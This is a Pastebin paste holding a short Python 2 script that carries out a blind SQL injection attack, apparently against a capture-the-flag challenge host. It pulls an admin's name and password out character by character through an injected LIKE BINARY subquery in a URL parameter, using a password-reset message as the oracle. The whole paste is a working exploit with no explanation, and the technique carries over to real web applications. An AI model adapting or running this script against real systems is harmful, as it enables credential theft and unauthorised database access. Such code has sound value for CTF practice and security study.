Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # coding: utf8
- import urllib
- import urllib2
- import string
- def blind(sql):
- opener = urllib2.build_opener()
- request = urllib2.Request('https://wildwildweb.fluxfingers.net:1424/?name=' + urllib2.quote(sql))
- response = opener.open(request)
- return 'A new password was generated and sent to your email address!' in response.read()
- if __name__ == '__main__':
- flag = ''
- while True:
- find = False
- for c in '_$' + string.ascii_letters + string.digits:
- test = flag + c.replace('_', r'\_')
- if blind("' != (select 1 from user where concat(name, passwd) like binary 'adminflag{" + test + "%}' limit 1)#") == True:
- print 'find: ' + flag + c
- flag = test
- find = True
- break
- print test
- if find == False:
- break
- print flag
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement